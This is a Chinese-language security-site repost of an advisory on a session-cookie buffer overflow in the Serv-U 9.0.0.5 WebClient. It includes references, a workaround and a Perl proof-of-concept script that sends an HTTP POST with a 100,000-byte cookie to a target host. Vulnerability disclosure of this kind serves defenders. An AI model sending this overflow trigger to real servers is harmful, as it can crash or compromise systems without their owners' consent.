热门关键字:   漏洞发布 网站安全 网络攻击 高级编辑 无限安全 云安全

Serv-U 9.0.0.5 Web客户端HTTP请求远程溢出漏洞

发布时间:2018-10-31 13:17文章来源:未知文章作者: 点击次数:
摘要:Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话

影响版本:
RhinoSoft Serv-U 9.0.0.5漏洞描述:
BUGTRAQ ID: 36895

Serv-U FTP是一款FTP服务程序。

Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie,就可能触发这个溢出,导致在用户机器上执行任意指令。<*参考
http://www.rangos.de/ServU-ADV.txt
http://secunia.com/advisories/37228/
*>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!---snip---
use IO::Socket;

$|=1;
$a = "A" x 100000;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');

print $sock "POST / HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db

7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
."Content-Length: 0\r\n\r\n";

while (<$sock>) {
print;
}
---snip---
SEBUG安全建议:
临时解决方法:

* 禁用WebClient服务,仅使用Serv-U FTP/SFTP组件。

厂商补丁:

RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.serv-u.com/
 

上一篇:Fckeditor2次上传漏洞(IIS6分号解析漏洞)
下一篇:Linux Kernel r8169驱动Out-of-IOMMU错误本地拒绝服务漏